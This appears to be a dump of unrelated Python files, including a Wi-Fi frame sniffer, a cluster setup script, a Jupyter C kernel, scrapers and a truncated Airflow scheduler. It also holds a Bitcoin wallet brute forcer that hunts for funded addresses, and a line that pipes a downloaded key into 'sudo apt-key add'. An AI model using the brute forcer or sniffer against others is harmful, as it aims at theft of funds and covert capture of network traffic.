# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
blacklist = {'logThreads', 'logMultiprocessing',
'logProcesses', 'currentframe',
'PercentStyle', 'StrFormatStyle', 'StringTemplateStyle',
'Filterer', 'PlaceHolder', 'Manager', 'RootLogger',
'root', 'threading'}
support.check__all__(self, logging, blacklist=blacklist)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@support.run_with_locale('LC_ALL', '')
def test_main():
tests = [
BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
RotatingFileHandlerTest, LastResortTest, LogRecordTest,
ExceptionTest, SysLogHandlerTest, IPv6SysLogHandlerTest, HTTPHandlerTest,
NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest,
MiscTestCase
]
if hasattr(logging.handlers, 'QueueListener'):
tests.append(QueueListenerTest)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
sniffer.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import pwd
import sys
import time  # used by hopper() below; not reliably re-exported by scapy.all
# import curses
import random
import signal
from threading import Thread  # used by run() and hopper() below
from loguru import logger
from functools import wraps
from scapy.all import *
import pyric.pyw as pyw
from boop.lib import *
from boop.lib.types import *
from boop.lib.channels import *
from boop.lib.network import Network
from boop.lib.d11_frame import Dot11Frame
class BadInterface(Exception):
def __init__(self, message):
super().__init__(message)
class Sniffer:
def __init__(self, interface: str, channel, target=None, verbose=1):
if not verbose:
logger.disable("boop.lib.sniffer")
if not ROOT:
raise OSError(f"User {pwd.getpwuid(os.getuid())[0]} is not root")
if interface not in MWINTERFACES:
if interface in INTERFACES:
raise BadInterface(
f"Interface {interface} exists but is not in the correct mode"
)
else:
raise BadInterface(f"{interface} is not a valid interface.")
self.interface = interface
self.channel = channel
self.handler_map = {
0: {
0: [self.ASSOC_REQ],
1: [self.ASSOC_RESP],
2: [self.REASSOC_REQ],
3: [self.REASSOC_RESP],
4: [self.PROBE_REQ],
5: [self.PROBE_RESP],
8: [self.BEACON],
9: [self.ATIM],
10: [self.DISASSOC],
11: [self.AUTH],
12: [self.DEAUTH] # 13: ACTION, 14: NO_ACTION
},
1: {
# 7: CTRL, 8: BLOCK_ACK_REQUEST, 9: BLOCK_ACK
10: [self.POLL],
11: [self.RTS],
12: [self.CTS],
13: [self.ACK],
14: [self.CFEND],
15: [self.CFECFA]
},
2: {
0: [self.DATA_PARSER],
1: [self.DATA_PARSER],
2: [self.DATA_PARSER],
3: [self.DATA_PARSER],
4: [self.DATA_PARSER],
5: [self.DATA_PARSER],
6: [self.DATA_PARSER],
7: [self.DATA_PARSER],
8: [self.DATA_PARSER],
9: [self.DATA_PARSER],
10: [self.DATA_PARSER],
11: [self.DATA_PARSER],
12: [self.DATA_PARSER],
}}
self.printer = printer
self.filter = f"ether host {target}" if target else None
self.sniffer_map = {"AP": {}, "CL": {}, "UCL": {}}
self.hidden = []
self.packets = 0
if __debug__:
logger.info(f"Sniffer Created on {interface}")
def __str__(self) -> str:
return f"Sniffer({self.interface})"
def __repr__(self) -> str:
return self.__str__()
def handler(self, packet_type):
@wraps(packet_type)
def __handle(func):
self.handler_map[packet_type[0]][packet_type[1]].append(func)
if __debug__:
logger.info(
f"Handler set for: {packet_type[0]}:{packet_type[1]}"
)
return func
return __handle
def router(self, pkt):
self.packets += 1
try:
self.df = Dot11Frame(pkt)
funcs = [x for x in self.handler_map[pkt.type][pkt.subtype]]
funcs[0](self.df)
for func in funcs[1:]:
func(self, self.df)
except KeyError:
pass
return
def run(self):
if not self.channel:
hop_thread = Thread(target=self.hopper)
hop_thread.daemon = True
hop_thread.start()
else:
interface = pyw.getcard(self.interface)
set_channel(interface, int(self.channel))
printer_thread = Thread(target=self.printer, args=(self,))
printer_thread.daemon = True
printer_thread.start()
sniff(
iface=self.interface, filter=self.filter, prn=self.router, store=0
)
def hopper(self):
interface = pyw.getcard(self.interface)
while True:
channel = random.choice(TWOHERTZ)
# print("channel", channel)
set_channel(interface, channel)
self.channel = channel
time.sleep(4.5)
def ap(self, mac):
# print(self.sniffer_map["AP"].get(mac, None))
return self.sniffer_map["AP"].get(mac, None)
def client(self, mac):
# print(self.sniffer_map["CL"].get(mac, None))
return self.sniffer_map["CL"].get(mac, None)
def ASSOC_REQ(self, dframe): pass
def ASSOC_RESP(self, dframe): pass
def REASSOC_REQ(self, dframe): pass
def REASSOC_RESP(self, dframe): pass
def PROBE_REQ(self, dframe): pass
def PROBE_RESP(self, dframe): pass
def BEACON(self, dframe):
dframe.network_stats()
        if self.ap(dframe.src):
            self.sniffer_map["AP"][dframe.src].signal = dframe.signal
            # Bare expression: presumably Network.__add__ bumps the beacon
            # count (cf. mBeacons in printer()) in place.
            self.sniffer_map["AP"][dframe.src] + 1
else:
# print(dframe.ssid)
self.sniffer_map["AP"][dframe.src] = Network(
dframe.ssid,
dframe.security,
dframe.cipher,
dframe.channel,
dframe.src,
dframe.src_vendor,
dframe.signal,
dframe
)
def ATIM(self, dframe): pass
def DISASSOC(self, dframe): pass
def AUTH(self, dframe): pass
def DEAUTH(self, dframe): pass
def POLL(self, dframe): pass
def RTS(self, dframe): pass
def CTS(self, dframe): pass
def ACK(self, dframe): pass
def CFEND(self, dframe): pass
def CFECFA(self, dframe): pass
def DATA_PARSER(self, dframe): pass
def set_channel(card, channel, sock=None):
while True:
try:
pyw.chset(card, channel, None, nlsock=sock)
return
except Exception as e:
logger.error(e)
time.sleep(1)
def printer(self):
while True:
print(self.packets)
for network in self.sniffer_map["AP"].values():
# print(network.mSSID, type(network.mSSID))
sys.stdout.write(
" {0}{1}{2}{3:<5}{4}{5:<5}{6:<8}{7}\n".format(
network.mMAC.ljust(19, " "),
network.mEnc.ljust(10, " "),
network.mCipher.ljust(11, " "),
str(network.mCh),
network.mVen.ljust(10, " "),
network.mSig,
network.mBeacons,
network.mSSID
)
)
time.sleep(10)
def signal_handler(sig, frame):
# curses.curs_set(True)
print("\n\n[+] SIGINT RECIEVED...\n")
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
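# A minimal usage sketch (assumptions: "wlan0mon" is a monitor-mode interface
# present in MWINTERFACES and the script runs as root). Handlers registered
# through Sniffer.handler are invoked as func(sniffer, frame); (0, 8) selects
# management frames of subtype beacon, matching handler_map above.
if __name__ == "__main__":
    demo = Sniffer("wlan0mon", channel=6)

    @demo.handler((0, 8))
    def on_beacon(sniffer, dframe):
        print(dframe.src, dframe.ssid)

    demo.run()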
|
core.py
|
import logging
from threading import Thread
import gym
from gym.wrappers import Monitor
import chi
import tensortools as tt
from chi_rl import get_wrapper
from tensortools.util import output_redirect
from time import time
import numpy as np
class Agent:
def __init__(self, generator, name=None, logdir=None):
self.logdir = logdir
self.name = name
self.logger = logging.getLogger(self.name)
handler = logging.FileHandler(logdir + '/logs/' + self.name) if logdir else logging.StreamHandler()
self.logger.addHandler(handler)
self.gen = generator
self.gen.send(None)
    def run(self, env, episodes=100000000, run_async=False):
        # `async` is a reserved word since Python 3.7, so the flag is renamed.
        if run_async:
            t = Thread(target=self.run, args=(env, episodes),
                       daemon=True, name=self.name)
            t.start()
            return
with output_redirect(self.logger.info, self.logger.error):
monitor = get_wrapper(env, gym.wrappers.Monitor)
tick = time()
for ep in range(episodes):
self.run_episode(env)
logi = 5
if ep % logi == 0 and monitor:
assert isinstance(monitor, Monitor)
at = np.mean(monitor.get_episode_rewards()[-logi:])
ds = sum(monitor.get_episode_lengths()[-logi:])
dt = time() - tick
tick = time()
self.logger.info(f'av. return {at}, av. fps {ds/dt}')
def run_episode(self, env: gym.Env):
        # The wrapper class was garbled in the source (".wrappers.Wrapper");
        # gym.Wrapper, the base class of all gym wrappers, is assumed here.
        meta_wrapper = get_wrapper(env, gym.Wrapper)
done = False
ob = env.reset()
a, meta = self.act(ob)
rs = []
while not done:
if meta_wrapper:
meta_wrapper.set_meta(meta) # send meta information to wrappers
ob, r, done, info = env.step(a)
a, meta = self.act(ob, r, done, info)
rs.append(r)
return sum(rs)
def act(self, *args) -> tuple:
if not self.gen:
self.gen = self.action_generator()
self.gen.send(None)
args = args[0] if len(args) == 1 else args
r = self.gen.send(args)
r = r or (None, {})
return r
def action_generator(self):
pass
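# A minimal sketch (not from the original project) showing how act() and
# action_generator() cooperate: the generator is primed with send(None),
# receives observations (or (ob, r, done, info) tuples) via send(), and
# yields (action, meta) pairs. env is assumed to be a standard gym.Env.
class RandomAgent(Agent):
    def __init__(self, env, **kwargs):
        self.env = env
        super().__init__(self.action_generator(), **kwargs)

    def action_generator(self):
        ob = yield  # primed by Agent.__init__; the first real send() delivers ob
        while True:
            # ignore the observation and sample a random action with empty meta
            ob = yield self.env.action_space.sample(), {}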
|
EnvSetup.py
|
#!/usr/bin/env python
import os
import paramiko
import argparse
import subprocess
import time
import threading
#Constants
RemoteHomeDir = "/users/nigo9731/"
RemoteDir = "/users/nigo9731/Test/"
RemoteUser = "nigo9731"
LibPath = "/usr/local/lib/"
def scp(direction, localFile, user, server, path):
	if direction:
os.system("scp " + localFile + " " + user + "@" + server + ":" + path)
else:
os.system("scp " + user + "@" + server + ":" + path + " " + localFile)
def runSSHCommand(server, username, command):
client = paramiko.client.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(server, username=username)
stdin, stdout, stderr = client.exec_command(command)
stdoutAsString = []
stderrAsString = []
for line in stdout:
stdoutAsString.append(line)
for line in stderr:
stderrAsString.append(line)
return stdoutAsString, stderrAsString
def scpLibrary(server, username):
scp(True, "/usr/lib/x86_64-linux-gnu/libtbb*", username, server, RemoteHomeDir)
scp(True, LibPath + "libbtree*", username, server, RemoteHomeDir)
scp(True, LibPath + "librtree*", username, server, RemoteHomeDir)
scp(True, LibPath + "libdtranx*", username, server, RemoteHomeDir)
runSSHCommand(server, username, "sudo mv "+RemoteHomeDir+ "libtbb* /usr/lib/")
runSSHCommand(server, username, "sudo mv "+RemoteHomeDir+ "libbtree* /usr/local/lib/")
runSSHCommand(server, username, "sudo mv "+RemoteHomeDir+ "librtree* /usr/local/lib/")
runSSHCommand(server, username, "sudo mv "+RemoteHomeDir+ "libdtranx* /usr/local/lib/")
def runBash(command):
out, err = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).communicate()
return out
def RunHyperdex(ip, RemoteUser):
print runSSHCommand(ip, RemoteUser, " wget -O - http://ubuntu.hyperdex.org/hyperdex.gpg.key | sudo apt-key add -; ")
print scp(True, "./hyperdex.list", RemoteUser, ip, "/users/nigo9731/Test/")
print runSSHCommand(ip, RemoteUser, " sudo mv /users/nigo9731/Test/hyperdex.list /etc/apt/sources.list.d/;")
print runSSHCommand(ip, RemoteUser, " sudo apt-get update; sudo apt-get -y install hyperdex-warp libhyperdex-client-dev-warp python-hyperdex-client-warp vim sysstat mutrace valgrind")
# the following are for running the hyperdex
#print runSSHCommand(ip, RemoteUser, "mkdir ~/Test/hyperdex; hyperdex daemon -f --listen="+ip+" --listen-port=7778 --coordinator=128.104.222.31 --coordinator-port=7777 --data=/users/nigo9731/Test/hyperdex &> ~/Test/hyperdex.output &")
#print runSSHCommand(ip, RemoteUser, "rm -rf ~/Test/hyperdex*")
def WaitForThreads(threads):
while True:
deleted_threads = []
for thread in threads:
			if not thread.isAlive():
thread.join()
deleted_threads.append(thread)
for thread in deleted_threads:
threads.remove(thread)
if len(threads) == 0:
			break
time.sleep(5)
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers()
runtime_parser = subparsers.add_parser('run', help='deployment for runtime environment')
runtime_parser.set_defaults(subcommand='run')
runtime_parser.add_argument("-c","--cluster",dest="cluster",help="cluster config file required for vm mode: ip list", required = True)
runtime_parser.add_argument("-j","--job",dest="job",help=
"job type: \n"
"lib(install libraries);\n"
"hyperdex(install hyperdex);\n"
"bench(copy benchmark related files);\n"
"helper(run a command in each node)", required = True)
runtime_parser.add_argument("-o","--other",dest="other", help=
"for bench, specify the dtranx cluster size for generating ips file(default: every node in the cluster)")
args = parser.parse_args()
if args.subcommand == 'run':
ips = []
f = open(args.cluster,'r')
for line in f:
ips.append(line.strip())
print ips
if args.job == "lib":
#install dynamic library
threads = []
for ip in ips:
print ip
thread = threading.Thread(target = scpLibrary, args = (ip,RemoteUser,))
thread.start()
threads.append(thread)
WaitForThreads(threads)
elif args.job == "hyperdex":
bash ="\
echo deb [arch=amd64] http://ubuntu.hyperdex.org trusty main >> ./hyperdex.list;"
runBash(bash)
threads = []
for ip in ips:
print ip
thread = threading.Thread(target = RunHyperdex, args = (ip,RemoteUser,))
thread.start()
threads.append(thread)
WaitForThreads(threads)
runBash("rm ./hyperdex.list")
elif args.job == "bench":
baseIP = "192.168.0."
index = 0
localipsFile = open('localips', 'w')
try:
clusterSize = int(args.other)
except:
print "input cluster size as the -o option to generate ips for benchmark tests"
exit()
for i in range(clusterSize):
index = index + 1
localipsFile.write(baseIP + str(index) + '\n')
		localipsFile.close()
for ip in ips:
print ip
print scp(True, "/home/neal/Documents/dev/YCSB-C-DTranx/ycsbc", RemoteUser, ip, "/users/nigo9731/")
print scp(True, "/home/neal/Documents/dev/YCSB-C-DTranx/Scripts/HashGenerator", RemoteUser, ip, "/users/nigo9731/")
print scp(True, "/home/neal/Documents/dev/YCSB-C-DTranx/Scripts/InitializeHyperdex.py", RemoteUser, ip, "/users/nigo9731/")
print scp(True, "/home/neal/Documents/dev/YCSB-C-DTranx/workloads/workloaddtranx.spec", RemoteUser, ip, "/users/nigo9731/")
print scp(True, "/home/neal/Documents/dev/YCSB-C-DTranx/workloads/workloadbtree.spec", RemoteUser, ip, "/users/nigo9731/")
print scp(True, "/home/neal/Documents/dev/YCSB-C-DTranx/workloads/workloadrtree.spec", RemoteUser, ip, "/users/nigo9731/")
print scp(True, "/home/neal/Documents/dev/Scripts/metric/monitor.sh", RemoteUser, ip, "/users/nigo9731/")
print scp(True, "/home/neal/Documents/dev/Scripts/metric/process.sh", RemoteUser, ip, "/users/nigo9731/")
print scp(True, "/home/neal/Documents/dev/DTranx/Build/Example/Tranx/CreateSnapshot", RemoteUser, ip, "/users/nigo9731/")
print scp(True, "/home/neal/Documents/dev/DTranx/Build/Example/Tranx/RunMetis", RemoteUser, ip, "/users/nigo9731/")
print scp(True, "localips", RemoteUser, ip, "/users/nigo9731/ips")
runBash("rm localips");
|
run_mnemonic.py
|
# Plutus Bitcoin Brute Forcer
# Made by Isaac Delly
# https://github.com/Isaacdelly/Plutus
import multiprocessing
import bitcoinlib
import plutus
import oldKeyGen
import newKeyGen
def main(database):
print('Working...')
while True:
# Mnemonic
words = bitcoinlib.mnemonic.Mnemonic().generate()
        # from_passphrase is a constructor-style class method; building a
        # throwaway HDKey() first just wastes a key generation.
        key = bitcoinlib.keys.HDKey.from_passphrase(words)
private = str(key)
public = key.public()
plutus.process(private, public, key.address(), database, words)
plutus.process(private, public, key.address_uncompressed(), database, words)
if __name__ == '__main__':
database = plutus.read_database()
# for cpu in range(multiprocessing.cpu_count()):
# for cpu in range(1):
# multiprocessing.Process(target=main, args=(database, )).start()
main(database)
|
server_request_header.py
|
'''
An HTTP server that logs request headers:
1. create a socket
2. bind & reuse addr
3. listen
4. while True:
4.1 accept
4.2 when a new client connects => create a new process to handle it
'''
import socket
import multiprocessing
def handle_client(client_socket, client_addr):
    '''
    Handle one client connection:
    1. recv
    2. write the HTTP request header to "http_request_header.txt"
    3. stop once the client closes the connection
    '''
    while True:
        recv_data = client_socket.recv(1024)
        if not recv_data:  # empty bytes => the peer closed the connection
            break
        with open('http_request_header.txt', 'wb') as f:
            f.write(recv_data)
        print(recv_data)
    client_socket.close()
with socket.socket(socket.AF_INET,socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
s.bind(('127.0.0.1',2333))
s.listen(100)
while True:
client_socket,client_addr=s.accept()
p = multiprocessing.Process(target=handle_client,args=[client_socket,client_addr])
p.start()
client_socket.close()
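# A minimal client sketch (not part of the original) to exercise the server:
# it connects to the address bound above and sends a bare GET request whose
# header then lands in http_request_header.txt.
#
#   import socket
#   c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   c.connect(('127.0.0.1', 2333))
#   c.send(b'GET / HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n')
#   c.close()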
|
kernel.py
|
from queue import Queue
from threading import Thread
from ipykernel.kernelbase import Kernel
import subprocess
import tempfile
import os
import os.path as path
class RealTimeSubprocess(subprocess.Popen):
"""
A subprocess that allows to read its stdout and stderr in real time
"""
def __init__(self, cmd, write_to_stdout, write_to_stderr):
"""
:param cmd: the command to execute
:param write_to_stdout: a callable that will be called with chunks of data from stdout
:param write_to_stderr: a callable that will be called with chunks of data from stderr
"""
self._write_to_stdout = write_to_stdout
self._write_to_stderr = write_to_stderr
super().__init__(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=0)
self._stdout_queue = Queue()
self._stdout_thread = Thread(target=RealTimeSubprocess._enqueue_output, args=(self.stdout, self._stdout_queue))
self._stdout_thread.daemon = True
self._stdout_thread.start()
self._stderr_queue = Queue()
self._stderr_thread = Thread(target=RealTimeSubprocess._enqueue_output, args=(self.stderr, self._stderr_queue))
self._stderr_thread.daemon = True
self._stderr_thread.start()
@staticmethod
def _enqueue_output(stream, queue):
"""
Add chunks of data from a stream to a queue until the stream is empty.
"""
for line in iter(lambda: stream.read(4096), b''):
queue.put(line)
stream.close()
    def write_contents(self):
        """
        Forward the currently available stdout and stderr content to the
        callables specified when the instance was created.
        """
def read_all_from_queue(queue):
res = b''
size = queue.qsize()
while size != 0:
res += queue.get_nowait()
size -= 1
return res
stdout_contents = read_all_from_queue(self._stdout_queue)
if stdout_contents:
self._write_to_stdout(stdout_contents)
stderr_contents = read_all_from_queue(self._stderr_queue)
if stderr_contents:
self._write_to_stderr(stderr_contents)
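# Usage sketch for RealTimeSubprocess (the command is a placeholder): poll
# until the child exits, draining whatever output has been queued so far,
# exactly as CKernel.do_execute does below.
#
#   p = RealTimeSubprocess(['echo', 'hello'],
#                          lambda b: print(b.decode(), end=''),
#                          lambda b: print(b.decode(), end=''))
#   while p.poll() is None:
#       p.write_contents()
#   p.write_contents()  # drain anything emitted between the last poll and exit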
class CKernel(Kernel):
implementation = 'jupyter_c_kernel'
implementation_version = '1.0'
language = 'c'
language_version = 'C11'
language_info = {'name': 'c',
'mimetype': 'text/plain',
'file_extension': 'c'}
banner = "C kernel.\n" \
"Uses gcc, compiles in C11, and creates source code files and executables in temporary folder.\n"
def __init__(self, *args, **kwargs):
super(CKernel, self).__init__(*args, **kwargs)
self.files = []
mastertemp = tempfile.mkstemp(suffix='.out')
os.close(mastertemp[0])
self.master_path = mastertemp[1]
filepath = path.join(path.dirname(path.realpath(__file__)), '..', 'resources', 'master.c')
subprocess.call(['gcc', filepath, '-std=c11', '-rdynamic', '-ldl', '-o', self.master_path])
def cleanup_files(self):
"""Remove all the temporary files created by the kernel"""
for file in self.files:
os.remove(file)
os.remove(self.master_path)
def new_temp_file(self, **kwargs):
"""Create a new temp file to be deleted when the kernel shuts down"""
# We don't want the file to be deleted when closed, but only when the kernel stops
kwargs['delete'] = False
kwargs['mode'] = 'w'
file = tempfile.NamedTemporaryFile(**kwargs)
self.files.append(file.name)
return file
def _write_to_stdout(self, contents):
self.send_response(self.iopub_socket, 'stream', {'name': 'stdout', 'text': contents})
def _write_to_stderr(self, contents):
self.send_response(self.iopub_socket, 'stream', {'name': 'stderr', 'text': contents})
def create_jupyter_subprocess(self, cmd):
return RealTimeSubprocess(cmd,
lambda contents: self._write_to_stdout(contents.decode()),
lambda contents: self._write_to_stderr(contents.decode()))
def compile_with_gcc(self, source_filename, binary_filename):
args = ['gcc', source_filename, '-std=c11', '-fPIC', '-shared', '-rdynamic', '-o', binary_filename]
return self.create_jupyter_subprocess(args)
def do_execute(self, code, silent, store_history=True,
user_expressions=None, allow_stdin=False):
with self.new_temp_file(suffix='.c') as source_file:
source_file.write(code)
source_file.flush()
with self.new_temp_file(suffix='.out') as binary_file:
p = self.compile_with_gcc(source_file.name, binary_file.name)
while p.poll() is None:
p.write_contents()
p.write_contents()
if p.returncode != 0: # Compilation failed
self._write_to_stderr(
"[C kernel] GCC exited with code {}, the executable will not be executed".format(
p.returncode))
return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [],
'user_expressions': {}}
p = self.create_jupyter_subprocess([self.master_path, binary_file.name])
while p.poll() is None:
p.write_contents()
p.write_contents()
if p.returncode != 0:
self._write_to_stderr("[C kernel] Executable exited with code {}".format(p.returncode))
return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}}
def do_shutdown(self, restart):
"""Cleanup the created source code files and executables when shutting down the kernel"""
self.cleanup_files()
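# Typical entry point for an ipykernel-based kernel (a sketch; the real
# project may keep this in a separate __main__ module instead):
if __name__ == '__main__':
    from ipykernel.kernelapp import IPKernelApp
    IPKernelApp.launch_instance(kernel_class=CKernel)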
|
baiduimagedownload.py
|
# coding:utf-8
# python 2.7.5
#
# Fetch some images from Baidu Images
# 1. specify the tags
# 2. fetch the listing:
# http://image.baidu.com/channel/listjson?pn=0&rn=1000&tag1=%E6%98%8E%E6%98%9F&tag2=%E5%BC%A0%E5%AD%A6%E5%8F%8B&ftags=&sorttype=0&ie=utf8&oe=utf-8&image_id=692147105
# pn    paging offset
# rn    number of images per page
# tag1  main tag
# tag2  sub tag
# ignore the other fields for now
#
# 3. parse the returned JSON into a dict
# 4. take the download_url of each entry
# 5. download
# 6. use multiple threads to speed things up
from urllib import urlretrieve, urlcleanup
from urllib2 import *
import json
from hashlib import md5
import sys
class Baiduimage():
"""
"""
def __init__(self, tag1, tag2, number=1, stored="."):
self.tag1 = tag1
self.tag2 = tag2
self.number = str(number)
self.url = self.make_url()
self.stored = stored
print "work start"
def make_url(self):
url = "http://image.baidu.com/channel/listjson?pn=0&rn=" + self.number + "&tag1=" + self.tag1 + "&tag2=" + self.tag2 + "&ftags=&sorttype=0&ie=utf8&oe=utf-8"
return url
def request_body(self):
request = Request(self.url)
# request.add_header();
r = urlopen(request)
return r.read()
def parse_body(self):
jsonstr = json.loads(self.request_body())
        urls = [i['download_url'] for i in jsonstr['data'] if 'download_url' in i]
        return (urls, len(urls))
def image_name(self, url):
return self.stored + "/" + md5(url).hexdigest() + "." + url.split(".")[-1]
    def download_image(self):
        (urls, urlnumber) = self.parse_body()
        def download(url):
try:
urlretrieve(url, self.image_name(url))
urlcleanup()
except:
return False
return True
print "want " + self.number + " images, get images links " + str(urlnumber)
if urlnumber == 0:
print "Could not find a image link"
pass
else:
print "Download start press Ctrl+Break to stop "
count = 0
for id, i in enumerate(urls):
                if download(i):
count += 1
sys.stdout.write("Dowdload[" + str(id + 1) + "] has download " + str(count) + chr(8) * 80)
sys.stdout.flush()
print "\nwork end"
    def download_image_thread(self, threadnumber=2):
"""
"""
(urls, urlnumber) = self.parse_body()
print "Download start press Ctrl+Break to stop "
        def download(url):
try:
urlretrieve(url, self.image_name(url))
urlcleanup()
except:
return False
return True
from Queue import Queue
from threading import Thread
from itertools import count
def worker(count=count()):
while True:
(id, item) = q.get()
                if download(item):
                    sys.stdout.write("Download[" + str(id + 1) + "] downloaded " + str(next(count) + 1) + chr(8) * 80)
sys.stdout.flush()
q.task_done()
q = Queue()
for i in range(threadnumber):
t = Thread(target=worker)
t.daemon = True
t.start()
for id, item in enumerate(urls):
q.put((id, item))
q.join() # block until all tasks are done
print "work end"
if __name__ == "__main__":
print "this is a test with thread "
Baiduimage("明星", "刘德华", 100).dowload_image_thread() # 自定义分类 关键词 图片个数 存放路径
|
manager_godbless.py
|
"""
This is the client file for part1.
You can input texts to send to the server and then the server
will echo the message back.
author: Yuhang Sun
assignment: PA1
"""
# !pip install torch
import socket
from threading import Thread
from PIL import Image
import torchvision.transforms as transforms
g_socket = None
g_conn_pool = []
g_conn_use = []
def get_image():
img = Image.open('images/dog.jpeg').convert('RGB')
img = transforms.ToTensor()(img)
row = img.shape[1]
column = img.shape[2]
ss = "1 " + str(row) + " " + str(column) + " "
img_numpy = img.numpy().flatten()
for num in img_numpy:
ss += str(num) + ' '
return ss
def handle_client():
while True:
client, addr = g_socket.accept()
print(addr)
g_conn_pool.append(client)
g_conn_use.append(False)
def handle_send_image(client, ind):
msg = get_image()
print(">>> Sending the image..")
msg += "\n"
client.send(msg.encode("utf-8"))
print(">>> Finish sending.")
    # receive the feedback from the worker
    msg = ""
    while True:
        feedback = client.recv(1024)
        if not feedback:  # the worker closed the connection
            raise Exception
        chunk = feedback.decode("utf-8")
        # The original compared msg before appending the new chunk, so the
        # "404" error reply could never match; compare the decoded chunk.
        if chunk == "404":
            raise Exception
        msg += chunk
        if msg[-1] == '\n':
            break
    print(">>> Received from the worker: " + msg)
g_conn_use[ind] = False
def main():
global g_socket, g_conn_pool
g_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
g_socket.bind(('DESKTOP-3N4U79Q', 2888))
g_socket.listen(5)
print("服务端已启动,等待客户端连接...")
t = Thread(target=handle_client)
    t.daemon = True
t.start()
while True:
        cmd = input("Enter a command: ")
        if cmd == '':
            continue
        if cmd == 'exit':
            exit()
        # compare as a string: int(cmd) would raise on non-numeric input
        if cmd == '1':
            print("Currently connected workers:", len(g_conn_pool))
for i in range(len(g_conn_pool)):
if not g_conn_use[i]:
print(">>> Use worker " + str(i + 1))
g_conn_use[i] = True
t = Thread(target=handle_send_image, args=(g_conn_pool[i], i))
                t.daemon = True
t.start()
break
if __name__ == '__main__':
main()
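# Worker-side sketch (an assumption, not part of this file) for decoding the
# text protocol built by get_image(): "1 <rows> <cols> <pix0> <pix1> ...\n"
# carries a tag, the spatial dimensions, and a flattened 3xHxW float tensor.
#
#   import numpy as np
#   def parse_image(msg):
#       fields = msg.split()
#       tag, row, column = int(fields[0]), int(fields[1]), int(fields[2])
#       pixels = np.array(fields[3:], dtype=np.float32)
#       return tag, pixels.reshape(3, row, column)  # channels-first RGB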
|
scheduler_job.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from datetime import timedelta
from time import sleep
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow import configuration as conf
from airflow import executors, models, settings
from airflow.exceptions import AirflowException
from airflow.models import DagRun, SlaMiss, errors
from airflow.stats import Stats
from airflow.ti_deps.dep_context import DepContext, QUEUE_DEPS
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (AbstractDagFileProcessor,
DagFileProcessorAgent,
SimpleDag,
SimpleDagBag,
SimpleTaskInstance,
list_py_file_paths)
from airflow.utils.db import provide_session
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.jobs.base_job import BaseJob
from airflow.utils.state import State
class DagFileProcessor(AbstractDagFileProcessor, LoggingMixin):
"""Helps call SchedulerJob.process_file() in a separate process.
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: unicode
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_id_white_list: If specified, only look at these DAG ID's
:type dag_id_white_list: list[unicode]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(self, file_path, pickle_dags, dag_id_white_list):
self._file_path = file_path
        # The process that was launched to process the given file.
self._process = None
self._dag_id_white_list = dag_id_white_list
self._pickle_dags = pickle_dags
# The result of Scheduler.process_file(file_path).
self._result = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time = None
        # This ID is used to uniquely name the process / thread that's launched
        # by this processor instance
self._instance_id = DagFileProcessor.class_creation_counter
DagFileProcessor.class_creation_counter += 1
@property
def file_path(self):
return self._file_path
@staticmethod
def _run_file_processor(result_channel,
file_path,
pickle_dags,
dag_id_white_list,
thread_name):
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: unicode
:param pickle_dags: whether to pickle the DAGs found in the file and
